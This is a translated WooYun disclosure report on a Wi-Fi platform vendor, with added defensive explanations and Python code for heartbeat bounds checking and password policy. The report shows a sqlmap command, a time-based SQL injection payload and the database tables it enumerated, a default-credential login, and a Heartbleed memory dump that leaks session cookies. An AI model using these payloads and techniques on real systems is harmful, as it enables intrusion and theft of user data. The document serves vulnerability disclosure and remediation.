Vulnerability summary (24 followers)

Defect ID: wooyun-2016-0208629

Title: Wi-Fi security: bundled vulnerabilities in a "Wireless City" platform (affects 4,600+ wireless devices and 90k user records)

Vendor: 无限城市(北京)科技有限公司 (Wireless City (Beijing) Technology Co., Ltd.)

Author: 黑色键盘丶

Submitted: 2016-05-15 12:50

Fixed: 2016-07-02 14:30

Published: 2016-07-02 14:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-05-15: Details sent to the vendor; awaiting vendor handling
2016-05-18: Vendor confirmed; details disclosed to the vendor only
2016-05-28: Details disclosed to core white hats and domain experts
2016-06-07: Details disclosed to regular white hats
2016-06-17: Details disclosed to intern white hats
2016-07-02: Details disclosed to the public

Brief description:

See title.

Details:

Seeing that two fellow white hats have already gone after big vendors, I figured I'd give it a try too:
http://**.**.**.**/bugs/wooyun-2010-0206169
http://**.**.**.**/bugs/wooyun-2010-0204620
I downloaded the app; the username field at the login form threw an error, so I tested it and found it was injectable.


1.jpg


sqlmap command: sqlmap.py -r 1.txt --dbs
------------------------- POST request (1.txt), injectable userName parameter -----------
POST /JBaas/interfaceapp/checkLogin HTTP/1.1
Content-Length: 70
Content-Type: application/x-www-form-urlencoded
Host: **.**.**.**:8080
Connection: Keep-Alive
Accept-Encoding: gzip
passWord=hddfjhddjfrh&userName=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98%27
----------------------------- payload ----------
Payload: passWord=hddfjhddjfrh&userName=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98' AND (SELECT * FROM (SELECT(SLEEP(5)))FhhX)-- NInl


Database information
back-end DBMS: MySQL 5.0.12
available databases [5]:
[*] information_schema
[*] jbaas
[*] mysql
[*] performance_schema
[*] radiusdb


Tables in the current database: roughly 96k member records and 4,614 AP devices
Database: jbaas
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| t_bus_app_device | 96821 |
| t_bus_member | 96053 |
| t_bus_ap | 4614 |
| t_bus_app_log | 630 |
| t_portal_log | 114 |
| t_sys_acl | 105 |
| t_sys_dictionary | 77 |
| t_sys_role_resource | 49 |
| t_bus_market | 37 |
| t_portal_template | 31 |
| t_sys_resource | 25 |
| t_bus_shop | 24 |
| t_bus_app_feedback | 21 |
| t_bus_area | 20 |
| t_bus_vector | 19 |
| t_bus_ac | 16 |
| t_sys_unit | 15 |
| t_portal_template_content_tree | 14 |
| t_portal_address | 12 |
| t_portal_template_content | 12 |
| t_portal_messageset | 11 |
| t_portal_messagetemplate | 10 |
| t_portal_template_tree | 10 |
| t_bus_market_indoormap | 8 |
| t_portal_strategy | 8 |
| t_motor_config | 7 |
| t_bus_promotion | 6 |
| t_bus_goods | 5 |
| t_portal_advertisement | 4 |
| t_portal_advertisement_and_list | 4 |
| t_portal_advertisement_list | 4 |
| t_bus_app | 3 |
| t_portal_notice | 3 |
| t_sys_actor | 3 |
| t_bus_syn | 2 |
| t_portal_phone | 2 |
| t_sys_role | 2 |
| t_bus_app_config | 1 |
+---------------------------------+---------+


This includes Wi-Fi passwords and the like.


2.png


**.**.**.**/cms: logged in with test / 123456


23.png


One OpenSSL heartbeat leak
python openssl.py **.**.**.** | more
---------------------------------------------------
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 16384
... received message: type = 22, ver = 0302, length = 14397
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 48 54 4D 4C ....#.......HTML
00e0: 2C 20 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 , like Gecko) Ch
00f0: 72 6F 6D 65 2F 33 38 2E 30 2E 32 31 32 35 2E 31 rome/38.0.2125.1
0100: 32 32 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 22 Safari/537.36
0110: 20 53 45 20 32 2E 58 20 4D 65 74 61 53 72 20 31 SE 2.X MetaSr 1
0120: 2E 30 0D 0A 52 65 66 65 72 65 72 3A 20 68 74 74 .0..Referer: htt
0130: 70 73 3A 2F 2F 34 32 2E 36 32 2E 31 31 2E 36 32 ps://**.**.**.**
0140: 2F 62 69 67 44 61 74 61 2F 6F 73 2F 6D 61 69 6E /bigData/os/main
0150: 2E 70 68 70 3F 63 3D 6C 6F 67 75 73 65 72 26 61 .php?c=loguser&a
0160: 3D 66 72 61 6D 65 26 73 69 74 65 69 64 3D 35 37 =frame&siteid=57
0170: 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E ..Accept-Encodin
0180: 67 3A 20 67 7A 69 70 2C 64 65 66 6C 61 74 65 0D g: gzip,deflate.
0190: 0A 41 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 .Accept-Language
01a0: 3A 20 7A 68 2D 43 4E 2C 7A 68 3B 71 3D 30 2E 38 : zh-CN,zh;q=0.8
01b0: 0D 0A 43 6F 6F 6B 69 65 3A 20 50 48 50 53 45 53 ..Cookie: PHPSES
01c0: 53 49 44 3D 61 66 62 37 38 62 61 33 33 37 39 37 SID=afb78ba33797
01d0: 36 63 61 34 34 64 39 31 36 30 32 62 35 31 37 66 6ca44d91602b517f
01e0: 33 35 35 30 0D 0A 0D 0A BA CF E8 6B 04 DC B3 2B 3550.......k...+
01f0: 9B F6 A2 F5 DE 3C 7E 41 32 F4 21 EC 03 03 03 03 .....<~A2.!.....
0200: 3D 6C 6F 67 3B 20 50 48 50 53 45 53 53 49 44 3D =log; PHPSESSID=
0210: 61 66 62 37 38 62 61 33 33 37 39 37 36 63 61 34 afb78ba337976ca4
0220: 34 64 39 31 36 30 32 62 35 31 37 66 33 35 35 30 4d91602b517f3550
0230: 0D 0A 0D 0A 72 73 9F 9D E6 64 96 EE 8F 35 75 6C ....rs...d...5ul
0240: A3 06 A9 80 3B 2F 1C AC 07 07 07 07 07 07 07 07 ....;/..........
0250: F0 C9 AA 0E 14 EC C0 42 F1 78 DF 98 36 98 51 AC .......B.x..6.Q.
0260: E4 17 58 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ..X.............
0270: 33 39 61 32 65 61 30 30 61 66 30 35 0D 0A 0D 0A 39a2ea00af05....
0280: 4E 3D 20 CF 76 95 0D 9D EB 6A C3 53 60 79 6F C8 N= .v....j.S`yo.
0290: 5E F1 CA BF 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B ^...............
02a0: CB DA 28 9A F5 11 9E E1 3D 99 85 12 DD C4 97 47 ..(.....=......G
02b0: 37 63 64 62 30 66 65 66 61 65 31 37 66 62 34 66 7cdb0fefae17fb4f
02c0: 38 34 36 65 62 63 62 30 34 65 37 34 35 39 0D 0A 846ebcb04e7459..
02d0: 0D 0A FC 0F 13 20 24 95 5F 61 55 ED F1 80 DF 43 ..... $._aU....C
02e0: 1E 53 2B 62 07 E3 09 09 09 09 09 09 09 09 09 09 .S+b............
02f0: 5A 2E 42 F4 6E 98 81 E6 BF C5 5C 86 7E 24 01 86 Z.B.n.....\.~$..
0300: 44 13 AF D7 44 55 E8 AD 93 6D 34 9B 29 57 15 FB D...DU...m4.)W..
0310: C8 DC F4 AC C4 6B 4E 9C 0C 77 4B 06 06 06 06 06 .....kN..wK.....
0320: 37 BE 16 93 E0 32 3E 7A 51 CC 79 F3 2D 02 02 02 7....2>zQ.y.-...
0330: 07 E1 95 6F 3B 40 F2 94 07 07 07 07 07 07 07 07 ...o;@..........
0340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
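The dump above begins with the bytes `02 40 00`: heartbeat type 2 (response) and a declared payload length of 0x4000 = 16384 bytes, the same figure the record layer reported. A server that trusts that declared length instead of checking it against the bytes it actually received returns memory it never got from the client, which is what fills the rest of the dump. The following is an added example, not code from the report or from OpenSSL: a small parser for the heartbeat message format of RFC 6520 that applies the missing bounds check (header plus declared payload plus the 16-byte minimum padding must fit inside the record) and an echo routine that only ever returns bytes that were really present. The malformed request it rejects is constructed here for the demonstration.

```python
import os
import struct

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
HEADER_LEN = 3      # 1-byte type + 2-byte payload_length
MIN_PADDING = 16    # RFC 6520: padding must be at least 16 bytes


def describe_heartbeat_header(record_body):
    """Decode the 3-byte heartbeat header, e.g. the report's '02 40 00' -> ('response', 16384)."""
    hb_type, declared_len = struct.unpack("!BH", record_body[:HEADER_LEN])
    names = {HEARTBEAT_REQUEST: "request", HEARTBEAT_RESPONSE: "response"}
    return names.get(hb_type, "unknown"), declared_len


def parse_heartbeat(record_body):
    """Parse a heartbeat message (TLS record content type 24) into (hb_type, payload).

    Raises ValueError for anything RFC 6520 section 4 says must be discarded silently;
    the length comparison is the check the vulnerable OpenSSL versions lacked."""
    if len(record_body) < HEADER_LEN:
        raise ValueError("truncated heartbeat header")
    hb_type, declared_len = struct.unpack("!BH", record_body[:HEADER_LEN])
    if hb_type not in (HEARTBEAT_REQUEST, HEARTBEAT_RESPONSE):
        raise ValueError(f"unknown heartbeat type {hb_type}")
    # Bounds check: header + declared payload + minimum padding must fit inside the record.
    if HEADER_LEN + declared_len + MIN_PADDING > len(record_body):
        raise ValueError(
            f"declared payload of {declared_len} bytes does not fit in a "
            f"{len(record_body)}-byte record")
    return hb_type, record_body[HEADER_LEN:HEADER_LEN + declared_len]


def build_heartbeat(hb_type, payload):
    """Serialise a well-formed heartbeat message with 16 bytes of random padding."""
    return struct.pack("!BH", hb_type, len(payload)) + payload + os.urandom(MIN_PADDING)


def answer_heartbeat(request_body):
    """Server side: echo only the bytes actually received, or return None to drop the message."""
    try:
        hb_type, payload = parse_heartbeat(request_body)
    except ValueError:
        return None
    if hb_type != HEARTBEAT_REQUEST:
        return None
    return build_heartbeat(HEARTBEAT_RESPONSE, payload)


# Constructed malformed request: declares a 16384-byte payload (0x4000, the length seen in
# the report's response) but carries only 16 bytes after the header.
MALFORMED_REQUEST = struct.pack("!BH", HEARTBEAT_REQUEST, 0x4000) + b"\x00" * 16
# The first three bytes of the response dump in the report.
REPORT_RESPONSE_HEADER = bytes.fromhex("024000")

if __name__ == "__main__":
    print(describe_heartbeat_header(REPORT_RESPONSE_HEADER))
    print("malformed request answered:", answer_heartbeat(MALFORMED_REQUEST))
    print("well-formed request answered:", answer_heartbeat(build_heartbeat(HEARTBEAT_REQUEST, b"ping")))
```

The practical remediation for the host in the report is to update OpenSSL (or rebuild it without heartbeat support) and then rotate the private key and every session cookie and credential that could have been in process memory, since the dump already shows live PHPSESSID values.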


34.png


Proof of vulnerability:


Fix suggestion:

Filter input; strengthen passwords.
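The second half of the fix, stronger passwords, applies directly to the /cms login that accepted test / 123456. As an added example (not the vendor's code), here is a credential policy check that rejects well-known default pairs, blocklisted passwords, short passwords, passwords containing the username and passwords drawn from too few character classes, plus an audit routine that runs the same rules over an account export. The blocklists and the sample accounts are constructed for the demonstration; a real deployment would back them with a much larger breached-password list.

```python
import re

# Constructed blocklists (assumptions, not from the vendor): the pair used on the report's
# /cms plus a few widely published defaults.
DEFAULT_CREDENTIAL_PAIRS = {
    ("test", "123456"), ("admin", "admin"), ("admin", "123456"), ("root", "root"),
}
COMMON_PASSWORDS = {
    "123456", "12345678", "password", "qwerty", "111111", "123123", "admin", "test", "test123",
}
MIN_LENGTH = 12
CHARACTER_CLASSES = (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]")


def password_problems(username, password):
    """Return the list of policy violations for a credential pair (empty list = acceptable)."""
    problems = []
    if (username.lower(), password) in DEFAULT_CREDENTIAL_PAIRS:
        problems.append("well-known default credential pair")
    if password.lower() in COMMON_PASSWORDS:
        problems.append("password is on the common-password blocklist")
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if username and username.lower() in password.lower():
        problems.append("password contains the username")
    classes = sum(bool(re.search(pattern, password)) for pattern in CHARACTER_CLASSES)
    if classes < 3:
        problems.append("uses fewer than three character classes")
    if password.isdigit() or re.fullmatch(r"(.)\1*", password):
        problems.append("all digits or a single repeated character")
    return problems


def audit_accounts(accounts):
    """Flag every (username, password) pair in an account export that violates the policy."""
    flagged = {}
    for user, pw in accounts:
        problems = password_problems(user, pw)
        if problems:
            flagged[user] = problems
    return flagged


# Constructed sample export: one default pair, one acceptable passphrase, one borderline password.
SAMPLE_ACCOUNTS = [
    ("test", "123456"),
    ("ops", "Ll0ng-passphrase!x"),
    ("alice", "alicePass1!"),
]

if __name__ == "__main__":
    for user, problems in audit_accounts(SAMPLE_ACCOUNTS).items():
        print(user, "->", "; ".join(problems))
```

Run at account creation and password change, the check stops the next test / 123456 from being set; run over an export, it finds the ones that already exist so they can be forced through a reset.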

Copyright notice: when reproducing, credit the source: 黑色键盘丶@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2016-05-18 14:28

Vendor reply:

CNVD has not directly reproduced the described issue and has not yet established a direct handling channel with the organisation that administers the site; awaiting claim.

Latest status:

None